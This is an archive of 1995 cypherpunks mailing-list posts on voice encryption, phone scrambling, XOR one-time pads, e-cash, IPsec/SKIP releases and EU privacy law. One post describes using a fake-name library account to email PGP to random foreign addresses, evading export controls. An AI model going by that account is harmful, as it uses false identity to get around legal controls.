reasons, and I doubt I'll be rushing to encrypt them anytime soon (or
expect the other party to).

* The versions of PGPFone, Nautilus, etc., that run on the Internet (as
opposed to modem-to-modem phone calls) will be extremely interesting
because of the pricing structure..."free" phone calls anywhere. (Some
people are doing this already, of course, and the telcos are starting to
notice.)

* I have a Macintosh, so I'm planning to get it and try it out. This may
change my views of things. But, to be honest, I'm fearful of the "when you
have a hammer, everything looks like a nail" syndrome: that when I find
someone else who has PGPFone I'll find reasons to call them just to test
the functioning. Needless to say, this is not reason enough to keep on
using it.

* Anecdotally, most people I know who have "secure phones" use them only
occasionally. Several people have said variants of "I only used it to test
it to see if it was working." It's not obvious to me that things will be
much different with even more casual users such as most of us are.

* It is a fact that the people most motivated to use crypto are the ones
with the most to fear from an anticipated threat. Thus, Pablo Escobar's
"crew" will likely deploy such tools, where Joe Suburban probably won't.

(The arguments sometimes made, that Mafiosos and Colombian drug cartels are
"too stupid" to use crypto are vitiated by the ease-of-use which these new
crypto tools are designed to have....also, corner drug dealers who some
might think to be illiterate are typically the earliest adopters of
cellular phones, pocket pagers, and whatnot.)

(Don't flame me for stating the obvious. I'm not advocating restrictions on
crypto, or invoking the Four Horsemen of the Infocalypse.)

* Finally, I have a "fax modem" on my Macintosh, as many of you do. Guess
what? I went and got a real fax machine. Lots of reasons. First, my fax
modem had to be installed just right...if inits or preferences got subtly
shifted, it stopped working properly. Second, sending things was a bitch.
(Had to have the scanner up and working, which was not often, etc.) Third,
robustness.

This is relevant to the cryptophone issue because many folks believe only
the "bump in the cord" model--where the crypto module is just a bump in the
phone cord--will work for most people. Most users will not have their 486 +
SoundBlaster + other stuff set up and working for routine phone calls.
(Configurations changing, various OSes, etc.)

(The Internet versions make it more advantageous to use one's computer, so
I have more hope for them than I do for modem-to-modem versions.
Incorporating a voice communication module into other
programs--telnet?--might be an idea. And Java and HotJava fit in
somehow....)

So, I hope to get PGPFone when it appears, but I'm not convinced it'll be
the biggest revolution imaginable.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 12 Aug 95 09:56:20 PDT
To: cypherpunks@toad.com
Subject: Re: Purple Boxes
Message-ID: <ac522afb01021004ad76@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:08 AM 8/12/95, Sauroth wrote:
>Actually quite a few hackers/phreaks have been encrypting phone
>conversations for a while.  Not by any complex mathematics but
>simple modifications to the phone frequencies...Don't have any
>sites handy but for those interested I'll look up some of my old
>material.  I'll also check a large compendium of boxes to see if
>Purple has been designated.  Anyone interested in box plans of
>different colors e-mail me.

And the  "simple modifications to the phone frequencies" points to why such
things are not "strong crypto."

At best, security through obscurity. At worst, self delusion.

It gets back to the threat model. If the threat model is interception by
the neighborhood kids, then schemes for frequency-hopping, scrambling,
"warbling," and PhasorPhone-like diddling are OK. If the threat model is
the local police department tapping one's phone, probably not enough, as
they likely can gain access to the E-Systems DigiTrac 6700 and trivially
unscramble the signal.

Long term, only robust, strong crypto works (Michael Handler's "civil
liberties through complex mathematics").

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Sat, 12 Aug 95 10:34:29 PDT
To: cypherpunks@toad.com
Subject: Stupid XOR Question
Message-ID: <199508121705.KAA23345@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


ok dumb questions here.........

how do i xor a simple string of plaintext?

I am running linux 1.2.4







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 12 Aug 95 07:05:54 PDT
To: cypherpunks@toad.com
Subject: e$: Reuters Smells the Coffee
Message-ID: <v02120d03ac526025ff8b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Mime-Version: 1.0
Date: Sat, 12 Aug 1995 00:01:58
From: infocker@megaweb.com
Sender: infocker@megaweb.com () (from unknown.aol.com 205.188.2.111)
To: www-buyinfo@allegra.att.com
Subject: Cyber Economy--Govts. Cannot Control

Thought Mr. Hettinga might particularly appreciate this perspective.

Jim Rapp
Alexandria, Virginia
"give me more info"

As always, do not send the copyright police after me.


LONDON - Growing business on the Internet computer network could
allow companies and individuals to avoid taxes and build up a black
economy increasingly out of range of government intervention and
regulation, computer experts say.

People will be able to download computer programs from
Philadelphia to Paris or buy books from Madrid in Manila, avoiding
export or import duties and sales taxes, as well as bypassing
government trade statistics.

"Electronic purses," loaded from banks down telephone lines,
could become the favored means of payment for fast, anonymous and
secure payments, with currencies of choice becoming more exotic,
depending on what is acceptable to dealmakers.

"Cyberdollars," expatriate U.S. currency zapping across telephone
lines between computers, could add to problems posed for authorities
by existing funds outside national borders.

Deals on the Internet are mainly completed by credit card at
present. But electronic purses could lead to a buildup of currency
beyond the control of governments and central banks, further limiting
their influence on economies and markets and making traditional
monetary tools like interest rates less effective.

"Online business will involve much more economic activity outside
the control and ambit of government," Madsen Pirie, director of the
Adam Smith Institute, a right-wing British think-tank, told Reuters.

"Government will have to limit its ambitions. Just like
governments in the modern world find it difficult to have exchange
control; they can't control billions of dollars of cash sloshing
around foreign exchange markets," he said.

Business is fairly modest now but will increase exponentially,
Pirie forecasts.

The U.S. Commerce Department has said electronic cash will
account for 20 percent of U.S. purchases by 2005, up from just over 4
percent last year and compared with just over 16 percent forecast by
2000.

Leaders of the information technology industry believe that the
embryonic stage is over and are wary of government action, which they
feel might inhibit growth.

Analysts reckon that any attempt to regulate cybermarkets is
likely to be futile.

The Adam Smith Institute's Pirie agrees, predicting: "Governments
will fail if they try to control this. They always have when they try
to hold back the way history is going."

- - - - -

Copyright, Reuters America Inc. All rights reserved
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an264373@anon.penet.fi (Sauroth)
Date: Sat, 12 Aug 95 03:19:08 PDT
To: cypherpunks@toad.com
Subject: Purple Boxes
Message-ID: <9508121008.AA10417@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



> it would be called the "purple box" because I have not heard
> of any other devices called "purple boxes" (i.e. this string
> in the "colorful" hacker namespace does not seem to be used up 
yet)
> and also the famous WWII compromised japanese diplomatic codes 
> were called Purple.

Actually quite a few hackers/phreaks have been encrypting phone 
conversations for a while.  Not by any complex mathematics but 
simple modifications to the phone frequencies...Don't have any 
sites handy but for those interested I'll look up some of my old
material.  I'll also check a large compendium of boxes to see if
Purple has been designated.  Anyone interested in box plans of 
different colors e-mail me.

Sauroth


----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Sat, 12 Aug 95 08:28:01 PDT
To: Mixmaster Mailing List <cypherpunks@toad.com
Subject: Mix-L is now archived..
Message-ID: <Pine.BSD.3.91.950812102234.17497A-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone,

	I added archiving to the mix-l mailing list on jpunix.com. All 
messages entered as of 08/12/95 will be available for archive. 
Additionally, the various information files for Mixmaster including the 
public keyring and the list of type 2 remailers are also available 
through Majordomo on jpunix.com.

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp, a Pine/PGP interface.

iQEVAwUBMCzIOaghiWHnUu4JAQG3vwf+OHUWveagC7EXNWSDe8ij93403+dZ2ilL
Tdqz8Bnf/FnA146xHZazyI9kIAiq0+w2ZHXubgPQA4tAZ6dssS79LbxTXx7woreh
+s/5siqoPwz27piEPWhw/JtfOev4O7tVGAn3LfVbau3ooIBtSSJsp3K2JD/2Si+J
xuGt67SRfCgcFYoEsp8bupzolQis6TGXt3yOQqhp6ZipLXkDwSqHdIaaL1Xd3LTi
4q56PqKQT1AkaYybmcX/KniV5F+rlLU9M3nYf10LZRXac7ll8BxYv3ugPsKpDs/H
ySDwu6or9aVBcEaqgJ5T41Pe+a3sIPxL9Px/ZJlHZCQno1+0+5Ej8Q==
=vN+3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 12 Aug 95 12:01:49 PDT
To: Tatjana vonBernhardi <unicorn@access.digex.net>
Subject: Re: Bank Fees and E-Cash
Message-ID: <199508121900.MAA19501@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:53 PM 8/11/95 -0400, Tatjana vonBernhardi wrote:
> you have surpassed yourself in assumption here.
>
> your hope that e-cash will some how reduce bank fees is a long stretch.

Eventually people will bypass the banks, directly transferring funds
to each other.  This will reduce the banks fees to zero.  The
banks will gradually lose control of the indecently lucrative 
funds transfer business, and have to go to the bread and butter 
business of borrowing short and lending long, and evaluating 
credit worthiness, and providing guarantees of payment.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 12 Aug 95 10:16:21 PDT
To: cypherpunks@toad.com
Subject: Re: PRZ encrypted voice software release imminent
Message-ID: <199508121713.NAA14198@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199508120857.BAA11361@ix5.ix.netcom.com>,
stewarts@ix.netcom.com (Bill Stewart) wrote:

>Yes, lots of us aren't using modems faster than 14400 now, but you can get a 
>14.4/19.2 modem at Fry's for well under $100.  (19.2 is unfortunately
>not quite enough to 16 kbps, given start and stop bits, unless you do
>synchronous
[...]
>Anybody who needs to avoid government or business-competitor eavesdroppers
>can probably
>afford $150 in extra hardware for their PC.
>
>This doesn't apply to international communications or folks in the boonies,
>where it's hard to get full performance out of modems, so you Commie
>spies and Earth First!ers will need more expensive high-tech equipment :-)...

Here is my usually plea to anyone designing a computer telephony
application that uses modems: please always include a low bandwidth codec!
I am on a brand new DMS-100 and have new lines running from the CO to my
house. I can still not go over 9600bps. My only alternative is ISDN, which
isn't just another $150, but $1000. Please give the user a choice of
codecs that allows for minimization of the requirenments alony _any_ of
the three axis of the perfomance cube.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMCzhMCoZzwIn1bdtAQFKXAGAoS3CU0svmkGps3khnqS+tblUR5te9iV9
p6Ifw9jeQlkL0T7uA8W1DUWKE7M4s+O6
=o9A4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 12 Aug 95 10:21:39 PDT
To: cypherpunks@toad.com
Subject: Re: Purple Boxes
Message-ID: <199508121719.NAA14221@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9508121008.AA10417@anon.penet.fi>, an264373@anon.penet.fi
(Sauroth) wrote:

>Actually quite a few hackers/phreaks have been encrypting phone 
>conversations for a while.  Not by any complex mathematics but 
>simple modifications to the phone frequencies...Don't have any 
>sites handy but for those interested I'll look up some of my old
>material.

This is encryption of the type that, as Bruce Schneier would say, prevents
your little sister from listening in on your phone call. Trivial to break.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMCziXSoZzwIn1bdtAQFLaQGA2e01U8TnIReKoNnq6UuUJsTvsfYK2tVk
f0By3gfne/eGlUJDPyIGXJ+tnuAKAilh
=N+fX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sat, 12 Aug 95 10:30:21 PDT
Subject: Re: Still more "S-1" foolishness
In-Reply-To: <199508112206.SAA27354@crypto.com>
Message-ID: <199508121738.NAA05367@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



I wrote:
>Here's a table of where the expanded key schedule bits come from
>(I think - this could be wrong, I had to tweek some of the output
>by hand).  Note that some key bytes are used much more often, and
>in more positions, than others, but every key byte does at least
>end up being used as input to each F eventually (but not always to
>each "target" byte).
>
>Sorry for the opaque notation; this reads best when used in conjunction
>with Colin's cool graph that he posted to sci.crypt last night.
>

Whoops - there was a bug in my understanding of what was going on
that conspired with a bug in my table generation program to make everything
wrong.  Here's the correct table, for those interested.  Sorry for the noise.

-matt


 R |    | G0   G1  F+0  F+1  F+2  F+3   (this key byte is input to this fn)
 O bytes| R+4  R+5 R+2  R+3  R+0  R+1   (key byte is mixed with this block byte)
 U |enc-| all  all R+6L R+6H R+7L R+7H  (output affects this byte)
 N |rypt| 0    1    2    3    4    5    (key schedule byte #)
 D |ed  |LLHH LLHH LLHH LLHH LLHH LLHH  (posn of orig key byte in sched byte)
======================================
 0  76   5831 9425 5362 4738 8492 5038 
 1  10   1497 5081 1928 0394 4058 1694 
 2  32   7053 1647 7584 6950 0614 7250 
 3  54   3619 7203 3140 2516 6270 3816 
 4  76   9275 3869 9706 8172 2836 9472 
 5  10   5831 9425 5362 4738 8492 5038 
 6  32   1497 5081 1928 0394 4058 1694 
 7  54   7053 1647 7584 6950 0614 7250 
 8  76   3619 7203 3140 2516 6270 3816 
 9  10   9275 3869 9706 8172 2836 9472 
10  32   5831 9425 5362 4738 8492 5038 	(number indicates position in schedule
11  54   1497 5081 1928 0394 4058 1694   of original key bytes; an entry
12  76   7053 1647 7584 6950 0614 7250   "5678" means key bytes 5 and 6 are
13  10   3619 7203 3140 2516 6270 3816   in the low order position of this
14  32   9275 3869 9706 8172 2836 9472   schedule entry and bytes 7 and 8
15  54   5831 9425 5362 4738 8492 5038   are in the high order position.  Bytes
16  76   1497 5081 1928 0394 4058 1694 	 are first run through an F functuon
17  10   7053 1647 7584 6950 0614 7250   and XORd with each other to create
18  32   3619 7203 3140 2516 6270 3816   the schedule nibble.)
19  54   9275 3869 9706 8172 2836 9472 
20  76   5831 9425 5362 4738 8492 5038 
21  10   1497 5081 1928 0394 4058 1694 
22  32   7053 1647 7584 6950 0614 7250 
23  54   3619 7203 3140 2516 6270 3816 
24  76   9275 3869 9706 8172 2836 9472 
25  10   5831 9425 5362 4738 8492 5038 
26  32   1497 5081 1928 0394 4058 1694 
27  54   7053 1647 7584 6950 0614 7250 
28  76   3619 7203 3140 2516 6270 3816 
29  10   9275 3869 9706 8172 2836 9472 
30  32   5831 9425 5362 4738 8492 5038 
31  54   1497 5081 1928 0394 4058 1694 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Sat, 12 Aug 95 11:15:53 PDT
To: cypherpunks@toad.com
Subject: Re: Stupid XOR Question
Message-ID: <199508121815.OAA19928@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Sat, 12 Aug 1995 10:05:16 -0700
>From: Anonymous User <nobody@c2.org>
>Subject: Stupid XOR Question

>ok dumb questions here.........
>
>how do i xor a simple string of plaintext?
>

In C, you open file f and

  while (((c = getc(stdin))!=EOF)&&((d = getc(f))!=EOF))
    putc(c^d, stdout) ;

If I remember correctly, Adam Back <aba@dcs.exeter.ac.uk> has a signature
block for the full C program to do this.  It's that tiny.

In a way, that program is better than RSA in 3 lines of PERL.  It's
provably unbreakable (provided the ranno source, f, is used only once and
is truly random).



 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +----------------------------------------------------------- Jean Ellison -+



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 12 Aug 95 15:16:57 PDT
To: cypherpunks@toad.com
Subject: Richelson Doesn't Know C (was Re: Richelson's Latest)
Message-ID: <ac52762a060210045753@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:45 PM 8/12/95, John Young wrote:
>   Jeffrey T. Richelson has a new book:
>
>   A Century of Spies: Intelligence in the Twentieth Century.
>   Oxford University Press, New York, 1995, 534 pp., $30.00.
>   ISBN 0-19-507391-6.

This is all well and good, for ciphergroupies, BUT WHAT DOES IT HAVE TO DO
WITH CODING IN C?

:-}

Seriously, I've read (or used as a reference) Richelson's books. His book
on U.S. Intelligence Agencies had a lot of good stuff on the more obscure
agencies, and is a great supplement to Bamford.

At least some cryptographers think this stuff is useful, as Whit D.
borrowed my copy for several months.

I look forward to getting this new one!

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@linknet.kitsap.lib.wa.us>
Date: Sat, 12 Aug 95 16:46:44 PDT
To: Anonymous <anon-remailer@utopia.hacktic.nl>
Subject: Re: F*** FOSTER
In-Reply-To: <199508102345.BAA14099@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.950812163257.2019A-100000@linknet.kitsap.lib.wa.us>
MIME-Version: 1.0
Content-Type: text/plain


This Foster (And other conspiracy) BS is totally boring and old. I joined 
this list to learn 
from people how to use PGP and other crypto. I would just LOVE to learn 
how to setup PGP on WIN NT and WIN `95 for all my buddies so we can work 
towards MASS DEPLOYMENT. ANYONE who wants to talk about THAT can e-mail me at:
 ericande@linknet.kitsap.lib.wa.us
O.K. I'll admit that conspiracies ARE fun party talk, but jeez! people, it 
is getting MORE than a little stale.
P.S. Why don't we just quit monkeying around W/ this "Export PGP 3 lines 
at a time" stuff?  Just do what I do: Get  a fakename acct. @ your local 
library, UUencode the PGP.ZIP file and send it to ANYONE with a foreign 
net.tag at random. I've been doing this for about 6 weeks now and I've 
probably gotten 5 or 6 hundred copies out by now.
Love,
eric





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 12 Aug 95 14:45:15 PDT
To: cypherpunks@toad.com
Subject: Richelson's Latest
Message-ID: <199508122145.RAA05323@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Jeffrey T. Richelson has a new book:

   A Century of Spies: Intelligence in the Twentieth Century.
   Oxford University Press, New York, 1995, 534 pp., $30.00.
   ISBN 0-19-507391-6.

   Jacket copy: "Richelson covers the crucial role of spy
   technology from the days of Marconi and the Wright Brothers
   to today's dazzling array of Space Age satellites,
   aircraft, and ground stations. He provides portraits of
   spymasters, spies and defectors ... the 'black magic' of
   U.S. and British codebreakers. A final chapter probes the
   still-evolving role of intelligence in the new world of
   disorder and ethnic conflict, from the high-tech wonders of
   the Gulf War to the surprising involvement of the French
   government in industrial espionage."

   Blurb: "This is the missing book -- the primer -- on the
   craft of intelligence. It is a highly informed briefing,
   set in historical persepctive, by the best of the spy
   watchers." -- William E. Burrows, author of "Deep Black."

   --

   Watchers of spy watchers will recall Richelson's excellent,
   "The U. S. Intelligence Community," and other fine work on
   spy satellites and Soviet intelligence.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kelly Goen <kelly@netcom.com>
Date: Sat, 12 Aug 95 18:43:54 PDT
To: cypherpunks@toad.com
Subject: First Source release SKIP Implementation shows up
Message-ID: <199508130141.SAA11710@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



------- Forwarded Message

Return-Path: skip-info@tik.ee.ethz.ch
Return-Path: <skip-info@tik.ee.ethz.ch>
Received: from ktik0 by mail4.netcom.com (8.6.12/Netcom)
	id UAA10299; Fri, 11 Aug 1995 20:12:46 -0700
Errors-To: caronni@tik.ee.ethz.ch
Reply-To: skip-info@tik.ee.ethz.ch
Originator: skip-info@tik.ee.ethz.ch
Sender: skip-info@tik.ee.ethz.ch
Precedence: bulk
From: Germano Caronni <caronni@tik.ee.ethz.ch>
Subject: SKIP (Security on the IP Layer) Sources
X-Listprocessor-Version: 6.0c -- ListProcessor by Anastasios Kotsikonas

- -----BEGIN PGP SIGNED MESSAGE-----

Hello everybody,

the Swiss version of SKIP is now available as a pre-alpha source code release
for IRIX, NetBSD, Nextstep and Solaris.
You may get it from ftp://ktik0.ethz.ch/~ftp/pub/packages/skip.

Have fun,
    Germano


Excerpt from the README:
========================================================================
This is ENskip, pre-alpha 0.10. ENskip is a security module for the TCP/IP
stack. It provides encryption, authentication and sequencing of packets on
the IP layer between two or more machines. For more information on the SKIP
protocol, see the Internet Draft draft-ietf-ipsec-aziz-skip-00.txt and
following. You might also want to check http://skip.incog.com for information
about the background, the protocol itself and future directions of it.

ENskip is pre-alpha. If you are not absolutely sure what this is all about,
you might want to read the draft, and perhaps reconsider using this package.

No bug-fixes, installation help or any other support is granted. If you
have any suggestions, comments or contributions to make ENskip work better, 
mail to skip@tik.ee.ethz.ch.

Enjoy!

M. Hauber and Ch. Schneider
G. Caronni
=======================================================================

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMCwX8rH8jId7euXhAQEJ4gP9EiwqFbUQI7XsLRDmZidFdzGHsTk2CQYx
GnDBM9Z5F117UDd5NLyK99h2QVuffjK9LxMd4KbTrO5gwKM/OeZHoJTdkfQHb3mN
FJrg++hWlrTggrrv6mPQuB2j4TzbsHwed2uLN/f9HmImFQtZ5UPqIUgTueJy5DDa
3DKmCVnpsfU=
=sjb1
- -----END PGP SIGNATURE-----

------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 12 Aug 95 19:26:59 PDT
To: cypherpunks@toad.com
Subject: Re: Euro Comm Adopts Privacy Directive (NewsClip)
Message-ID: <199508130226.TAA11553@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:45 PM 8/11/95 -0500, Anonymous wrote:
>
>
> European Commission Adopts Privacy Directive
>
> Brussels, Aug. 11, -- The European Commission is now well on
> its way towards affording a high level of protection to
> personal data held on computer systems, following the formal
> adoption of a Directive on the protection of personal data,
> Newsbytes has learned.

This is an even greater threat to privacy and rights than it 
appears.  In addition to the fact that enforcing such a law in a 
world where everyone has computers would require massive 
government intrusion, one must also consider the objective, the 
intent of such a law.   The intent of course is to limit what
we are permitted to know of each other.

In a world where contracts are largely enforced by reputations, 
(for example your visa card), governments can suppress freedom of 
contract by suppressing what information is available.  For 
example bankruptcy laws that violate freedom of contract are in 
part enforced by controlling what information credit bureaus are 
permitted to keep.  Indeed such restrictions are the major goal
of existing restraints on credit bureaus.

So not only does this law require extensive violation of freedom 
and privacy, the intent is also violation of peoples rights.

Both ends and the necessary means are, as usual, similar.


In the long run I do not think such laws can be effective unless 
governments use the same means to suppress privately computer 
mediated communication as the Chinese Empire used to suppress 
private paper mediated communication.  (The Chinese not only 
made paper a state monopoly, but they also castrated anyone 
with knowledge of paper making so that the knowledge would 
not be passed from father to son.)

This very vigorous enforcement did not hold back the tide for 
ever, but it held it back for a long time.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 12 Aug 95 19:26:59 PDT
To: CypherPunks <cypherpunks@toad.com>
Subject: Re: EU Data Protection
Message-ID: <199508130226.TAA11550@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:13 PM 8/11/95 +0100, Derek Bell wrote:
>In message <199508041840.OAA01729@clark.net>, Ray Cromwell writes:
>	What worries me about the *lack* of some form of data protection
>legislation is that is allows someone to build up a database of information
>which is a mishmash of truth, misunderstandings and lies. How would you feel if
>"Concerned Citizens against Cryptography" compiled a list of all members
>of this list, branding them as `dangerous, possibily criminal subversives'?

It is called freedom of speech and freedom of association.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Sat, 12 Aug 95 11:26:10 PDT
To: cypherpunks@toad.com
Subject: Re: IPSEC goes to RFC
Message-ID: <Pine.3.89.9508121922.A25018-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



Is this solely a US effort, or is any work being done outside the US ? If 
there is, I might be able to help out at least for the next couple of months.

	Mark

P.S. Thanks for your work on this, Perry...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 12 Aug 95 19:54:36 PDT
To: cypherpunks@toad.com
Subject: some points on weak codes
Message-ID: <199508130240.TAA26066@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


various points have been made about the undesirability
of weak voice scrambling mechanisms.

I'd like to advance the position that the use of trivially-broken 
codes is better than no codes at all, as long as the owner is
aware of the distinction.

one of the goals of cypherpunks is not necessarily to get a 
secure world (that is a *long* term goal), but to get a world
in which people are aware of the issues that cypherpunks are
interested in. Encryption, privacy, etc. 

now, along these lines, even a widespread trivially broken 
code penetration would be better than none at all.

this is a similar concept to that advocated by someone else
on this list, namely PRZ's manual that talks about how
you shouldn't use PGP on a shared system, and how you should
only exchange keys in person, as being a little to extreme
for the common man, for whom insecure crypto, along with
the *understanding* that it is not totally secure.

I think everyone here agrees on long term goals of widespread
encryption penetration. but one way to bridge that gap is to
just have "toy crypto". I see this deroated frequently on
the list but it is probably a very, very valuable public
relations mechanism. 

I mean, it's hard to imagine that in politics that distributing
little plastic symbols called "buttons" would have any social effect,
yet it has persisted since the invention of buttons.

things like a cheap "purple" kit, promoted by the cypherpunks, not
foolproof but easy to build and cheap to buy, would advance the
agenda in the long run in a very valuable way.

what we need to do is give people a variety of options to the
interested public laypeople, just like Ford and that anecdote demonstrates. 
are we saying, "you can have any crypto that you want, as long as the NSA 
can't break it in 1000 years"? that's the equivalent of saying, "you can 
have any car you want, as long as its black". we must resist the
illusion that there are only 2 kinds of crypto: insecure or secure.
there is a continuum of crypto, and casual users should not have
to worry about the capabilities of the NSA. IMHO we are sabotaging
our main goals, launching into a deep discussion of the NSA's
supercomputers and the theory of numbers whenever a newbie asks about 
what is available.

again, weak crypto is probably better than no crypto in most cases,
just because it helps improve public awareness. people can't even
comprehend the idea of what is "weak" or what is "strong" until
they even have a mental framework of what they are dealing with.



~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
\  / ~/ |\| | | |> |  : : : : : : Vladimir Z. Nuri : : : : <vznuri@netcom.com>
 \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 12 Aug 95 16:54:00 PDT
To: cypherpunks@toad.com
Subject: SOW_gut
Message-ID: <199508122353.TAA09469@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-13-95. NYPaper:


   "Not-So-Lethal Weapons: Items from the police catalogue,
   coming soon to a precinct near you."

      Cops "have the same basic options when confronting a
      Rodney King," said David Boyd of the National Institute
